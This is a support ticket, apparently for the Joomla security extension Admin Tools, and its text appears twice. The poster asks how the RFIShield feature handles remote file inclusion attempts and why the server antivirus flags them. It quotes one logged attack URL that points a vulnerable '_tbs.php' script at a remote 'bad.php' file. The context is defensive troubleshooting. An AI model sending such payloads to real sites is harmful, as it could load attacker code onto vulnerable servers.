Mandatory information about my setup:
Have I read the related troubleshooter articles above before posting (which pages?)? Yes
Have I searched the tickets before posting? Yes
Have I read the documentation before posting (which pages?)? Yes
Joomla! version: 2.5.11
PHP version:
MySQL version: (unknown)
Host: (optional, but it helps us help you)
Admin Tools version: 2.4.4
Description of my issue:
We have been getting RFI attacks where the URL's looked like this:
http://www.ourwebsite.com/wp-content/themes/couponpress/thumbs/_tbs.php?src=http://picasa.com.civicimobiliare.ro/bad.php
Admin tools has been catching these and logging them, but also the antivirus on the server has been catching these which is making me a little nervous. When I looked at the description of the RFI functionality it says:
Remote File Inclusion block (RFIShield)
Some hackers will try to force a vulnerable extension into loading PHP code directly from their server. This is done by passing an http(s):// or ftp:// URL in their request, pointing to their malicious site. When this option is enabled, Admin Tools will look for such cases, try to fetch the remote URL and scan its contents. If it is found to contain PHP code, it will block the request.
My question is, when admin tools is fetching the remote URL to scan the contents, is that what the antivirus is picking up? Is it a false positive result? If we did not have antivirus running, would it have infected the site? Is there a way to just block requests like this instead of trying to fetch and scan the contents?
Thanks!
Have I read the related troubleshooter articles above before posting (which pages?)? Yes
Have I searched the tickets before posting? Yes
Have I read the documentation before posting (which pages?)? Yes
Joomla! version: 2.5.11
PHP version:
MySQL version: (unknown)
Host: (optional, but it helps us help you)
Admin Tools version: 2.4.4
Description of my issue:
We have been getting RFI attacks where the URL's looked like this:
http://www.ourwebsite.com/wp-content/themes/couponpress/thumbs/_tbs.php?src=http://picasa.com.civicimobiliare.ro/bad.php
Admin tools has been catching these and logging them, but also the antivirus on the server has been catching these which is making me a little nervous. When I looked at the description of the RFI functionality it says:
Remote File Inclusion block (RFIShield)
Some hackers will try to force a vulnerable extension into loading PHP code directly from their server. This is done by passing an http(s):// or ftp:// URL in their request, pointing to their malicious site. When this option is enabled, Admin Tools will look for such cases, try to fetch the remote URL and scan its contents. If it is found to contain PHP code, it will block the request.
My question is, when admin tools is fetching the remote URL to scan the contents, is that what the antivirus is picking up? Is it a false positive result? If we did not have antivirus running, would it have infected the site? Is there a way to just block requests like this instead of trying to fetch and scan the contents?
Thanks!
